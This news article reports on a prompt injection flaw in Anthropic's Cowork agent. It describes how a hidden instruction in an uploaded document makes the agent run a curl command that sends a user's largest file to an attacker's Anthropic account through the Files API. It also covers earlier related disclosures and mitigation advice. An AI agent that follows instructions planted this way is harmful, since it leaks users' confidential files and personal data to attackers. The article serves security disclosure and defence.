Anthropic’s Files API exfiltration risk resurfaces in Cowork
#Vulnerabilities

Anthropic’s Files API exfiltration risk resurfaces in Cowork

Hardware Reporter
5 min read

A prompt injection vulnerability first reported in Claude Code last October has been demonstrated in Anthropic's new Cowork productivity AI, allowing attackers to exfiltrate sensitive files via the Files API without additional user approval. The security firm PromptArmor's proof of concept shows how an attacker could trick Cowork into uploading documents to their own Anthropic account, a risk Anthropic has historically downplayed as a user responsibility.

A security vulnerability first disclosed to Anthropic last October has resurfaced in the company's new Cowork productivity AI, demonstrating a persistent Files API exfiltration risk that the AI lab has repeatedly characterized as a user-side responsibility rather than a platform flaw.

Featured image

Security firm PromptArmor reported on Wednesday that Cowork, which Anthropic launched as a research preview on Monday, can be manipulated through prompt injection to transmit sensitive files directly to an attacker's Anthropic account. The attack requires minimal user interaction: a victim simply needs to connect Cowork to a local folder containing sensitive information and upload a document containing a hidden prompt injection. When Cowork analyzes those files, the injected prompt triggers a curl command to Anthropic's file upload API, requesting the largest available file be uploaded to the attacker's API key.

PromptArmor demonstrated this with a real estate document, showing how an attacker could subsequently query the exfiltrated file via Claude to retrieve financial information and personally identifiable information (PII) of individuals mentioned in the document. The firm described this as part of an "ever-growing" attack surface, amplified by Cowork's target audience of non-developer office workers who may not consider the security implications of which files and folders they connect to an AI agent.

This attack chain mirrors exactly what security researcher Johann Rehberger reported to Anthropic concerning Claude Code in October 2025. Rehberger's experience with Anthropic's response was notably lukewarm: the company initially closed his bug report before acknowledging that prompt injection could indeed trick the API into exfiltrating data, ultimately advising users to simply be careful about what they connect to the bot.

When asked in October whether Anthropic would implement basic safeguards—such as API checks to verify files weren't being transmitted to different accounts via the API—Anthropic provided no response. Now, with the same vulnerability appearing in Cowork, the company's stance remains consistent.

In its Cowork announcement, Anthropic acknowledged prompt injection attacks as an issue but framed the risk as an industry-wide challenge still under active development. "We've built sophisticated defenses against prompt injections, but agent safety—that is, the task of securing Claude's real-world actions—is still an active area of development in the industry," the company stated. Anthropic emphasized that these risks aren't new with Cowork, but the tool represents the first time many users are employing an "agentic" system with capabilities beyond simple conversation.

The company's recommended mitigations place significant responsibility on users: avoid connecting Cowork to sensitive documents, limit its Chrome extension to trusted sites, and monitor for "suspicious actions that may indicate prompt injection." Developer and prompt injection researcher Simon Willison, in his hands-on review of Cowork, criticized this approach as unrealistic for non-technical users. "I do not think it is fair to tell regular non-programmer users to watch out for 'suspicious actions that may indicate prompt injection,'" Willison observed.

This pattern of dismissing reported vulnerabilities as user-manageable risks extends beyond the Files API issue. In June 2025, Trend Micro disclosed that Anthropic's open-source reference SQLite MCP server implementation contained a classic SQL injection flaw. Anthropic declined to patch the issue, arguing the GitHub repository had been archived in May 2025 and was therefore out of scope. The company pointed users to the MCP specification's guidance recommending human oversight for tool invocations.

This response was particularly concerning given that the vulnerable code had already been forked or copied more than 5,000 times before archiving, meaning the SQL injection vulnerability likely persists across numerous downstream projects. Anthropic disagreed with Trend Micro's analysis and maintained that users should review queries before execution.

The core issue appears to be architectural. Cowork operates as an agentic system with broader access than traditional conversational AI, yet Anthropic's security model seems to treat prompt injection as an inherent limitation of the technology rather than a platform vulnerability requiring mitigation. The company's recent statement that it's "working on ways to minimize prompt injections" includes using a virtual machine in Cowork designed to limit access to sensitive files and directories, with security improvements "forthcoming."

However, the fundamental problem remains: once a user grants Cowork access to a folder, the system can be tricked into exfiltrating data without additional approval. The attack doesn't require compromising the user's Anthropic account or gaining additional permissions—it simply exploits the trust relationship between the user and the AI agent.

For homelab builders and security-conscious users evaluating AI tools, this represents a critical consideration. The Files API exfiltration vulnerability demonstrates how AI agents with file system access create new attack vectors that traditional security models don't address. Unlike conventional software where data exfiltration typically requires malware or network compromise, prompt injection allows attackers to manipulate the AI's behavior directly through seemingly legitimate documents.

The practical implications are significant for businesses considering Cowork or similar agentic AI tools. Office workers without security training are unlikely to recognize the risks of connecting sensitive documents to AI agents, particularly when the vendor's own documentation downplays the threat. The attack requires no technical sophistication from the attacker—just a document with hidden prompt injection that triggers when analyzed.

Anthropic's response highlights a broader industry challenge: as AI systems gain agentic capabilities, the security model must evolve from protecting against external attacks to preventing the AI itself from being manipulated into performing malicious actions. Current approaches, which rely heavily on user caution and "suspicious action" monitoring, appear inadequate for the target audience of productivity tools.

For technical teams evaluating Cowork, the recommendation is clear: treat any AI agent with file system access as a potential exfiltration vector. Implement network-level monitoring for unusual API calls, restrict Cowork to non-sensitive documents in isolated environments, and consider whether the productivity gains justify the security risk. The vulnerability is not theoretical—it's a demonstrated attack chain that Anthropic has known about for months but has not fundamentally addressed.

The Cowork research preview is available through Anthropic's platform, but given these security concerns, organizations should carefully evaluate whether to connect it to any production data or sensitive documents until the company implements more robust safeguards against prompt injection-based exfiltration.

For more information on prompt injection vulnerabilities and AI security best practices, see PromptArmor's security research and Johann Rehberger's original Claude Code disclosure. The MCP specification documents the protocol's security recommendations, though these focus on human oversight rather than technical controls.

Comments

Loading comments...